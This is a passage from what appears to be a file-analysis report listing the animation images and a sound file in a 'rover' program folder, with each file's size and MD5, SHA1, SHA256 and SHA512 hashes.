                                                                                                                                                          SHA1

                                                                                                                                                          d42dde78eb9548de2171978c525194f4fa2c413c

                                                                                                                                                          SHA256

                                                                                                                                                          0083bb52df2830f2fc0e03ffa861728916e3f1a6db3560e66adbca9716318ee3

                                                                                                                                                          SHA512

                                                                                                                                                          6ffbcc1c6ad1a0c01a35fdbf14918dfc9e2026a3021e3b6d761d56f4006b4218ffc2278eb2f820ae54722cd0c35fde40ca715154f6e2ae6c24aef0724d0ed004

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.018.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          e17061f9a7cb1006a02537a04178464d

                                                                                                                                                          SHA1

                                                                                                                                                          810b350f495f82587134cdf16f2bd5caebc36cf5

                                                                                                                                                          SHA256

                                                                                                                                                          9049038f58e048cc509bcc51434119465c376700ec45bedfd1d8f45440bdc32a

                                                                                                                                                          SHA512

                                                                                                                                                          d5b899109a16195d3fdb8f23382b48bab70dfcd0c823a03a0cdc4e50501812fc644b938839c3346e8aabc2925ce3bdebffad07ef2f90d291663275ba3d225ab3

                                                                                                                                                        • C:\Program Files (x86)\rover\Come\Come.019.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          63dbf53411402e2a121c3822194a1347

                                                                                                                                                          SHA1

                                                                                                                                                          86a2e77e667267791054021c459c1607c9b8dbb6

                                                                                                                                                          SHA256

                                                                                                                                                          47b80b828244964005bd947b80958f3aa6372b843dc088e33fbbd35ab3f785c5

                                                                                                                                                          SHA512

                                                                                                                                                          4b4603d88bddcb86e4282dafd55d8f00b852464daab588a554db829af566d5aa6baa3d575c58b133276be22203c014de73c0c3e35bfbe53570c356ef47bb5a50

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.001.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          0197012f782ed1195790f9bf0884ca0d

                                                                                                                                                          SHA1

                                                                                                                                                          fc0115826fbaf8cefa478e506b46b7b66a804f13

                                                                                                                                                          SHA256

                                                                                                                                                          c999fa6fd26a4a2af2155bd05522b44b54d6df90d1a9703a288bdf18b623c2cc

                                                                                                                                                          SHA512

                                                                                                                                                          614bce1f761871ba1113de49217725b7b6661c703b03864cef736f44e2d1e0c5fbe133966d24afb15900f0e4da16b24000a2a638b6d7839848874f386b3b81c1

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.002.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          b45ff2750a41e0d8ca6a597fbcd41b57

                                                                                                                                                          SHA1

                                                                                                                                                          cf162e0371a1a394803a1f3145d5e9b7cddd5088

                                                                                                                                                          SHA256

                                                                                                                                                          727a2aac0697bcfecdc56dc4507516f9f64c5faa426f0ce69f7e607b74c4e1f4

                                                                                                                                                          SHA512

                                                                                                                                                          82a9a3fc7dfae0ed6bf665c4f369f053af372551c1871d6b3dc775f447ba727e921ab831f8acd712cc31b66156eac643859404f05386e2592a15954fb78d87a3

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.003.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          95113a3147eeeb845523bdb4f6b211b8

                                                                                                                                                          SHA1

                                                                                                                                                          f817f20af3b5168a61982554bf683f3be0648da1

                                                                                                                                                          SHA256

                                                                                                                                                          800f0c501905bc4257415ee8bed738f897273600c721e80a15bcfbb2e2b3b847

                                                                                                                                                          SHA512

                                                                                                                                                          4e55d9ced90f255b20890595f8e07ccaeedcbe08aed6303336eae7f66df1e50429259b62c556d5d8b179f7f9be22216c1592ba772e2cebd257b3401109f45cc4

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.004.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          8ce29c28d4d6bda14b90afb17a29a7f9

                                                                                                                                                          SHA1

                                                                                                                                                          94a28ce125f63fcd5c7598f7cb9e183732ebdc16

                                                                                                                                                          SHA256

                                                                                                                                                          eb9abbeddd27ce6fa82f1f7437309209450f9f8412eb395923a45d946d9c50b1

                                                                                                                                                          SHA512

                                                                                                                                                          037babd109af1a2c05d7db87536bec41e3075d1120a37384d66f9460d8790be5732f8bbe6a2a13db3d017806fed88945f2a98697b586284b62760252276a8077

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.005.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          83ddcf0464fd3f42c5093c58beb8f941

                                                                                                                                                          SHA1

                                                                                                                                                          e8516b6468a42a450235bcc7d895f80f4f1ca189

                                                                                                                                                          SHA256

                                                                                                                                                          ebb3efda95b2d2588983742f96f51bdbcb9d87a6949f2c37ea11f509d236a536

                                                                                                                                                          SHA512

                                                                                                                                                          51a6925bc9558f9ba232b85623d78f975d1c18c1990ce62153aa57a742e0897c72fc0665213024f8d5af96e56cc47eb384ee8d231910fdef876a0889b52a59d8

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.006.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          6f530b0a64361ef7e2ce6c28cb44b869

                                                                                                                                                          SHA1

                                                                                                                                                          ca087fc6ed5440180c7240c74988c99e4603ce35

                                                                                                                                                          SHA256

                                                                                                                                                          457626948266abd4f0dcda6a09c448bb20cce3596b52076b8d90e1c626037dc9

                                                                                                                                                          SHA512

                                                                                                                                                          dc3d809eab3bfa7c65c35a36d55097e09fbefa2f6de962ae02c58540f6c88b3ca9be3361f3ec37b8ce7927e020463055c455f2e93baa3a3c12096b55abcab6d3

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.007.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          aac6fc45cfb83a6279e7184bcd4105d6

                                                                                                                                                          SHA1

                                                                                                                                                          b51ab2470a1eedad86cc3d93152360d72cb87549

                                                                                                                                                          SHA256

                                                                                                                                                          a59bb83276f003dd149c2143a5a70f012212c709e72af283209adfb85a0835b1

                                                                                                                                                          SHA512

                                                                                                                                                          7020ba8d918398bc2d5e6ea4aaea007d576d4c3577adab80259336505b06e8163d0afde5a7b4d802ba2dab9ec9c757e88eb37780246c35d38e5fed8648bbf3a1

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.008.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          fa73c710edc1f91ecacba2d8016c780c

                                                                                                                                                          SHA1

                                                                                                                                                          19fafe993ee8db2e90e81dbb92e00eb395f232b9

                                                                                                                                                          SHA256

                                                                                                                                                          cca9c6b8e0df9e09523ab59021ffff62b29273cae487335c87b569e8483aaae2

                                                                                                                                                          SHA512

                                                                                                                                                          f73b2ee270348247db1d7fea937cd69125afa6aef926dc5c1cef14b955630711fe106d56270172448d739014ae4fd7d221007aaa422b3625aa524b812baa10a2

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.009.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          3faefb490e3745520c08e7aa5cc0a693

                                                                                                                                                          SHA1

                                                                                                                                                          357ffa8b2d4797d8d6cf67c0c84818ebc746ce0a

                                                                                                                                                          SHA256

                                                                                                                                                          6ba5254c0b10b6939d5cd80f3ab87757143896d20fd8e014c3fcca35657e076b

                                                                                                                                                          SHA512

                                                                                                                                                          714d9d32ab070a992d84dc597a086afb7fe040300c33c25f9acdd27f5f8894145a5f9f8654b522c04a9cb1babeb25000fac25b01b1c820d4cfe8d67e40cd72a7

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.010.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          1bed8b0629ce72b595017371336ac688

                                                                                                                                                          SHA1

                                                                                                                                                          9180c6c3d0bdd3470fa38854de8af238bcc31d42

                                                                                                                                                          SHA256

                                                                                                                                                          a8cc3da0e5b87f10e6acd766bbd096dbe40ca60507867ec8ea66c56436fa6cd7

                                                                                                                                                          SHA512

                                                                                                                                                          4483b0ac1e83ef94f982aa7cf92767a24165060e1d492a87290a2301bcd2654e1c2e5d5cd637151408cac576d74d529b7d05e7e12b27e02afd17e24029a92ceb

                                                                                                                                                        • C:\Program Files (x86)\rover\Speak\Speak.011.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          c9eccb5ce7e65fd1eff7aba4a6fd43e8

                                                                                                                                                          SHA1

                                                                                                                                                          cd71011e1172a157627e1595cc7ce4888370a765

                                                                                                                                                          SHA256

                                                                                                                                                          a4045f846f5b3bb0856dbfdca78b5871433beefccb1416a2824e8dccce9f5975

                                                                                                                                                          SHA512

                                                                                                                                                          3b07f14cbc06f2a4a75067e09c04c760af324ebe2de5c51c88648b184337aad48d319c2753bc9987ebb2094719d92a0f87d7c0fd84c4d893dd8351e7dc6de3f8

                                                                                                                                                        • C:\Program Files (x86)\rover\Tap.wav
                                                                                                                                                          Filesize

                                                                                                                                                          33KB

                                                                                                                                                          MD5

                                                                                                                                                          ad73a11b139381a524f94babe2221240

                                                                                                                                                          SHA1

                                                                                                                                                          f6a87faff8630c0d8608ae94a63fd702217722e9

                                                                                                                                                          SHA256

                                                                                                                                                          e4b3ee655a41bb92b86614483987d6e60ae6f2493752263ae08145439ed9725d

                                                                                                                                                          SHA512

                                                                                                                                                          99a9ee26e3851b22ff09786c920a9ad64db617b20e2d4b70eac94f202f45c82c8636edb5aa822a351fa48253ee5fe7128746160f4dfcb483da74b57b0313b9ff

                                                                                                                                                        • C:\Program Files (x86)\rover\Tired\Tired.001.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          136be0b759f73a00e2d324a3073f63b7

                                                                                                                                                          SHA1

                                                                                                                                                          b3f03f663c8757ba7152f95549495e4914dc75db

                                                                                                                                                          SHA256

                                                                                                                                                          c9b925e1f1409ddaa3aadf1ae7c2fb3310b69fb931190b7dc2f274f517fe38fc

                                                                                                                                                          SHA512

                                                                                                                                                          263911753deffbce295dda3f311225edeb375555b1db2771477167600573bea78719f6294960dc5c5d95885194412dd0f133bae75a30e16556377263165b3723

                                                                                                                                                        • C:\Program Files (x86)\rover\Tired\Tired.002.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          f8f8ea9dd52781d7fa6610484aff1950

                                                                                                                                                          SHA1

                                                                                                                                                          973f8c25b7b5e382820ce479668eac30ed2f5707

                                                                                                                                                          SHA256

                                                                                                                                                          209e9d1fb6a814edfa4f8128d4a2168b274ea0eeb965a57f3c8b9695417a1bf1

                                                                                                                                                          SHA512

                                                                                                                                                          4f4e379afff8850eec6e4f3d165eba60f6916569ee7561b8bbf5a6bfeda27dbbcc0687ce02bece412616204f89861d23a92055a226cea14a29c53c653919c094

                                                                                                                                                        • C:\Program Files (x86)\rover\Tired\Tired.003.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          fb73acc1924324ca53e815a46765be0b

                                                                                                                                                          SHA1

                                                                                                                                                          62c0a21b74e7b72a064e4faf1f8799ed37466a19

                                                                                                                                                          SHA256

                                                                                                                                                          5488954fe5b4d87dee40dd68cc1d940d2395a52dc52d1c77f40cd2342b97efd8

                                                                                                                                                          SHA512

                                                                                                                                                          ea3ba299ca07850af45a29e2f88aece9163c13f4921a1fc05d930c008bc017b698c9fb987120147465a53fe0c0848926f543081716d5f877efa5a34b10822895

                                                                                                                                                        • C:\Program Files (x86)\rover\Tired\Tired.004.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          6da7cf42c4bc126f50027c312ef9109a

                                                                                                                                                          SHA1

                                                                                                                                                          8b31ab8b7b01074257ec50eb4bc0b89259e63a31

                                                                                                                                                          SHA256

                                                                                                                                                          2ebdf7d755b442de775819b0bcfe7bdd06fda92f6ad36dcfdeaab107f58f23df

                                                                                                                                                          SHA512

                                                                                                                                                          5c9783a8c14c6654db2a9a7818d4376fc3b2aeab9820539d20353018d90f734652ebba8052184b62f0e17f8f094da28c2bdfc73a0c707036fb5f923ed25625d9

                                                                                                                                                        • C:\Program Files (x86)\rover\Tired\Tired.005.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          d9d3c74ac593d5598c3b3bceb2f25b1d

                                                                                                                                                          SHA1

                                                                                                                                                          df14dee30599d5d6d67a34d397b993494e66700e

                                                                                                                                                          SHA256

                                                                                                                                                          2cba290a8c42f664a0e1a8e571e27bc846024fa7da9f7adc773a471ef74046bc

                                                                                                                                                          SHA512

                                                                                                                                                          de70858da11efb89e7db55762827f8c1d4b55aff14faea8ffd8a5f15d32d6956f6ca4a3fdd9ffd75906a818af81ba9c7ef056df7c8cec4076308df94ff3207ac

                                                                                                                                                        • C:\Program Files (x86)\rover\Tired\Tired.006.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          3071c94f1209b190ec26913a36f30659

                                                                                                                                                          SHA1

                                                                                                                                                          d76fbfbc4ddd17383b6a716f24d137a8dc7ff610

                                                                                                                                                          SHA256

                                                                                                                                                          89868008f5e5c55e5dd5982c15f105d11b9d3603ab45395dde0ec1c5ce61e683

                                                                                                                                                          SHA512

                                                                                                                                                          bd21f269dd92ab826caa6085bf79f17b6c9b6c4b660d03913295611bae590f277a9a0a0e39fa281737fcd9cfbbb6a5c8f02287d316954badca394e730bad72f4

                                                                                                                                                        • C:\Program Files (x86)\rover\_1Idle\_1Idle.003.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          533bc8e9ad951ba6d05c35a829e89156

                                                                                                                                                          SHA1

                                                                                                                                                          2709a1e51dcfa820a064ee3f0f34dea9cbc4fdee

                                                                                                                                                          SHA256

                                                                                                                                                          0827a66c31995a144229ca6b9bee27de94fd5bba937d25efde961dfa544d5c91

                                                                                                                                                          SHA512

                                                                                                                                                          d1d31f38686caacbe9453cc92c0bb88c4b085903b7b8eb455241839bec6b5ec4de0a0747cdfbcccb7468bb3bc6ca654e34a748762bb1a71e8e4b90285d397201

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.001.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          ee289f9f1f2d45dc9bcd7de5de0a70b5

                                                                                                                                                          SHA1

                                                                                                                                                          d3235b06c972b52425e7c0e7432ba4b5e926149c

                                                                                                                                                          SHA256

                                                                                                                                                          b0625e7b90f50ccd374832802b16ac0f3c66dc475d9a5a7d016dec4f643627b5

                                                                                                                                                          SHA512

                                                                                                                                                          74b02ba9e19f0b0f94d073ce35554e96f2247902fac6c25a94e6ed3b590493311f1f7b066fb5067ff641deacf8d2e60490eb11d3a9cad0702bd2ffdf9888eb0a

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.002.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          5f25c7d6d859be0c4e702c77e5e56545

                                                                                                                                                          SHA1

                                                                                                                                                          b2faf5451cc77855bed9f5bdd4d8dad6750e938e

                                                                                                                                                          SHA256

                                                                                                                                                          830e4fb48b9bd0be1e835a03ea6503bd639a104698035d56457e3e22a8a3fb1e

                                                                                                                                                          SHA512

                                                                                                                                                          c5a9cb01c59a0ded6d8e58386f0710c7538c5004977cb5a4d4d909d3aca1695ecc4e26f39e51107380a73dd36a1bd3204071c178aa0835b86e97e24e2c893144

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.003.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          7552e2573eae44f42feecc3de0874f52

                                                                                                                                                          SHA1

                                                                                                                                                          3c86e892af1c8f67eabce29f21f9d1cbe9419277

                                                                                                                                                          SHA256

                                                                                                                                                          7877cea4dbb9302bbd6fcd0d55021f031b9ad97e7fb12ed49710b35fd2627262

                                                                                                                                                          SHA512

                                                                                                                                                          bcbf36e86d28654f1a9f0fce11690dc92607cb7733c32bfa6a754ac9aea55892ced91f419d4f23764fe5643279cdc3812775e41f8c09add85c9323f797362768

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.004.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          704145e1c819ba0bd118896e1bc2bc6f

                                                                                                                                                          SHA1

                                                                                                                                                          0d6390c392143aebba0863fce6bb7720de610928

                                                                                                                                                          SHA256

                                                                                                                                                          2bf24636000e617957cd81fd5917ae52a79025a9ae7a74dee2776c6bbf185f66

                                                                                                                                                          SHA512

                                                                                                                                                          903abfa4171398e87bd6016681523e1c825f90157027c23f9cf6ab7d106b9141f9b7014bc28346336975d95536e47e8479aee48022fb09c630a50a87b2cb148e

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.005.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          28181087951ca5087ed53923d72ab7f0

                                                                                                                                                          SHA1

                                                                                                                                                          090390fa816970bc7552a7f6144b76bf14bffbaf

                                                                                                                                                          SHA256

                                                                                                                                                          7b0dbb6fc469ae9c58cf08986bbc4297dd0b7cd0d0dc1dc52bcb8c1e0b94e212

                                                                                                                                                          SHA512

                                                                                                                                                          02a6526cc31c47bcfe70bd8d92bf5907c6d1c91ba946c242367564ae1cb46a497f1e441538d0a19c191528eddb8749361e461a19c794015f5d54cc97e38f93ca

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.006.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          c360afcc76eb94cdf20781a0b830cf28

                                                                                                                                                          SHA1

                                                                                                                                                          c1098e3a3433dfbb00d2d1d3cafa839cb4dd979d

                                                                                                                                                          SHA256

                                                                                                                                                          8b7f916ead6d994b70b5c74f21f15825c73e8408c997368cc739f4bb202f64d7

                                                                                                                                                          SHA512

                                                                                                                                                          6d305349e2f663e4ab16bd3d0c392691e3fcfd788aa3ee2c0b8611b04be3012ce365e0902e72e30d9a7fb2d5ff9d4d43d438ef70e96f4ff965e198448b53be2d

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.007.png
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          cd411ed0f232ca6df0683a2d98c69d08

                                                                                                                                                          SHA1

                                                                                                                                                          92d21b73b2a2607d4256a119c14edeac064a5d46

                                                                                                                                                          SHA256

                                                                                                                                                          d7e3c68168eff617161b80100766abb98dcf35235c4b0ac5d73d10cbf233195f

                                                                                                                                                          SHA512

                                                                                                                                                          a7950fbdad30df061754ccc1fd7bd281112bd651c99b9c4ae8589d09ec0117092411fde9115e9c88d2a82e84c7cd9b8a757e65aa11ea73f9f8aeaaa1bdb7386b

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.008.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          3a1797eb60f7cba0729e7436c5083ef8

                                                                                                                                                          SHA1

                                                                                                                                                          c7d00a8e5a63beb7326ba4ccd80fdff07548058d

                                                                                                                                                          SHA256

                                                                                                                                                          89bb51ae4776d6330ba015e921903f1ade424605eeae72ddb630da5d2f645365

                                                                                                                                                          SHA512

                                                                                                                                                          b55ca566d5c76643ba63924268cd4b411be39e62e575740a2ac2e9437ed46dca6d1e4f0dc7b17d9bcc9006f28c34b09e2f751cfa96051d94d0eaadd302d8bc67

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.009.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          484d61f8905b02b256eeaf0ecd1a3510

                                                                                                                                                          SHA1

                                                                                                                                                          235cfc61fd3f0e8d944033a796a640bbcac3820a

                                                                                                                                                          SHA256

                                                                                                                                                          5db59fb8081674eb15b08fceb729018e26b31e9e70d02c15e8d8dee7fad2210f

                                                                                                                                                          SHA512

                                                                                                                                                          f301a8770e6017829a2e000616d9dbd3ccdab4e4fe356db7e02eaa3cb9e5b3c8f5db247498ce43ca0c6e0053de4f41a235b73803eb7c10655a46a69a2f1d2557

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.010.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          69c2a0ca8fcdd4238c04e44a67b92389

                                                                                                                                                          SHA1

                                                                                                                                                          10040c8c46696e7ef0afe2d96b1e53cfb0d2fd35

                                                                                                                                                          SHA256

                                                                                                                                                          9305ee4c237a4054409391b11c4adef5ae3eb554009b9a1042c7578402e0a4fe

                                                                                                                                                          SHA512

                                                                                                                                                          7a0838bde343264042769bdf0783deb0037e1f8b4463b944ab5ee0925414c938250d0fbdbcb0df8257f2437d46243825811b2087fa9993fe47d374f19df1ffa2

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.011.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          8dd35474bb3a9e7c3902790e673cf1f7

                                                                                                                                                          SHA1

                                                                                                                                                          6ffb9d7c6872a42900bc6d497cb784f16cf09c95

                                                                                                                                                          SHA256

                                                                                                                                                          8c5ffab08232f481c063e21dcf17b3eb2b4bcc1aa01f95b2cec3491d977a8379

                                                                                                                                                          SHA512

                                                                                                                                                          bb3a0df6c6260aa45847a7d7f5501c53adc5d6cb955f123334cf023167ad9a7dba2e2697b0afc96966c5947c01da08c964c113a3ce6c779c2c38236103beabfb

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.012.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          cf94413900538f1989afeb08895ce74e

                                                                                                                                                          SHA1

                                                                                                                                                          0dc0b01c3bfde5c84a385f36ff94b0b564609071

                                                                                                                                                          SHA256

                                                                                                                                                          aca5c8ac5974aa3bd50e1f9aef2ab1875ce18bfa956c66e5cf68f1b77bd5b372

                                                                                                                                                          SHA512

                                                                                                                                                          c32d95f4b391ffd1fba487696f0d253fa32a0f682c9e26c9aa4773e4cf2d9604e806c524bd889dd134f7e417b41b65f1ba465bc840e9b69149cdde959da9c97f

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.013.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          44f55377876cde7738eb9672b5e45472

                                                                                                                                                          SHA1

                                                                                                                                                          c42322a1949a0f7e9bb051f161dd9028f8f0c5bb

                                                                                                                                                          SHA256

                                                                                                                                                          a87c26895a26af7ce3e7b82711b98ab21e97ae9de88a9eb5b8fa09695149ec39

                                                                                                                                                          SHA512

                                                                                                                                                          74f95102d93a8ad4a49f6d62aeda4eea634a146cbc3c82705c07aacb0778af4b5fbb45cc65223322e69cf90570ab8a6bd75750a08a84e007968f2ecb67127b33

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.014.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          d2b245fa42b42889fb149e3b795c4d23

                                                                                                                                                          SHA1

                                                                                                                                                          78dada52357bb6ec7939d136def1029142093acc

                                                                                                                                                          SHA256

                                                                                                                                                          8d7b1a02e6ad5c09d797c7c234cf50b8c9f03782cdcd0857aea62440de586ced

                                                                                                                                                          SHA512

                                                                                                                                                          64d9de2739e14abcd110d0e983e00d750c801495d394ec1df76bd2b3dd61bf301ab0a237f67ec9eeb000fbcf859618e141ac04fe6bfac0d53aaa411f4d009682

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.015.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          e3e7a2316a9b147755c681de3dad6fd8

                                                                                                                                                          SHA1

                                                                                                                                                          f10f1686dc5a0b74bcc656a0d6c9ef263649d3a3

                                                                                                                                                          SHA256

                                                                                                                                                          346080d1b8b324984350e6ec0ba58ea4714a2aa16456ed723d533124a6838f97

                                                                                                                                                          SHA512

                                                                                                                                                          8ccb66e9807c6c01c3328e7d89536320ef999af9472df410778d9858cabbbd1f3f95c48052e0932b8a62cf0c87a7d1a8a4f68bfee5d0b3c06a7a85afeb0b4c67

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.016.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          1bda1d6f4d205b9b9ffb10312c6edb3b

                                                                                                                                                          SHA1

                                                                                                                                                          fd5b5e7e4e14a1fba4507dfba94575a0380c5ddb

                                                                                                                                                          SHA256

                                                                                                                                                          2c4d912df5ec1b607b4fc3f46d3f45f0dae0c18d1ae0d38c0869f0459de02be8

                                                                                                                                                          SHA512

                                                                                                                                                          f5e92a86ef8e29da89ceb5bbdf032bc6346f6ee6d0ac7ef45a61341aeddaefbc50f50ebe428b2e11ac812fdf446ffd1d4236f04799e72397530d7022604f6f1c

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.017.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          ef3dccfa2d7ec5f08de4ba35b7de19be

                                                                                                                                                          SHA1

                                                                                                                                                          9c748882a1ce105c87a284053abc40be3fd8c6fe

                                                                                                                                                          SHA256

                                                                                                                                                          d7f9368456462dd49d2d748cad0d7434e1b6533ed4735ef25367c61a9268e627

                                                                                                                                                          SHA512

                                                                                                                                                          adc87b202772d62185109805aa0eee236ebf2b194e408040da5a3b65ad63fb10bb386143cbc58a4c93092899f9d49f1046c32cc20089966e313811cd47943571

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.018.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          4205af6ce102e2aa3535e8048608ac88

                                                                                                                                                          SHA1

                                                                                                                                                          592fa0a803d766de226904ffda6503bc2ad72269

                                                                                                                                                          SHA256

                                                                                                                                                          0815a04cde2971002085fe52d03c54e748bd4f7c0b6b7a497e4d25944bee5d50

                                                                                                                                                          SHA512

                                                                                                                                                          38f70166c91ae6201a2b0e30194b051d9223aa42639c35ec318eb8e42fd8be6a37747103cf0c9ca793fe786f3f8870eb47cc44137450da07bbb76f6adff7910b

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.019.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          7649968ba2c78851547bbf66a0b0037f

                                                                                                                                                          SHA1

                                                                                                                                                          b03c8b4920b5c4b5eaa89f8c4419dd42f84d141c

                                                                                                                                                          SHA256

                                                                                                                                                          6505a603f2b1bddb2c90b4552d8c6d0c80b1a2943fe6bdd351b755bd7e5234eb

                                                                                                                                                          SHA512

                                                                                                                                                          3be4c8cf0a99a20c6c0529db2d4e1973877bef40178cb39b160fbdf3e0079fdcc148dbf9c9cd5ef7c61c3501e82f7627a17ae72650db038ed976f518734db058

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.020.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          db867a92e41e13ca6b9c10b54765e92a

                                                                                                                                                          SHA1

                                                                                                                                                          e5f5007665b9b3450d39b6f809232aea7c94c08d

                                                                                                                                                          SHA256

                                                                                                                                                          36378bc24c42e8626a5ab3787d1042eb9cfb0631b75d7783c15e277994543b30

                                                                                                                                                          SHA512

                                                                                                                                                          d2966a88d2ef878d3c185b7e1bf8f21e66b29eb5671cfb6148559982f4e839a00811d4868b35d888d816956554a1245b580368d75eeb8efe24578430eefe2b21

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.021.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          8a626a7014c456b8990edaaeaff8beab

                                                                                                                                                          SHA1

                                                                                                                                                          bf7f851eac2dbc7142ffe2d3b6b0b150b6a0926e

                                                                                                                                                          SHA256

                                                                                                                                                          26175d583bea4bdeb61149436f5ce0e9e184021bad732e2ef06d581faf75a9a8

                                                                                                                                                          SHA512

                                                                                                                                                          face442676f587509929ef4d9ea4a2e56cb7340b25a240e2feb56497c2e09c3388b8b32154f378d1bb1aa982d3973aeb608b57f649a2a04571418ddc877626ac

                                                                                                                                                        • C:\Program Files (x86)\rover\_3Idle\_3Idle.022.png
                                                                                                                                                          Filesize

                                                                                                                                                          3KB

                                                                                                                                                          MD5

                                                                                                                                                          67ff2a60571fd568c8fec5ce05327b94

                                                                                                                                                          SHA1

                                                                                                                                                          d2e80e0a72d381831b6814abeed07f05f1a7e939

                                                                                                                                                          SHA256

                                                                                                                                                          391fcdb792a4c8add226b4bc3d099da1d72f7565723f24aa726c8d7473e58bbe

                                                                                                                                                          SHA512

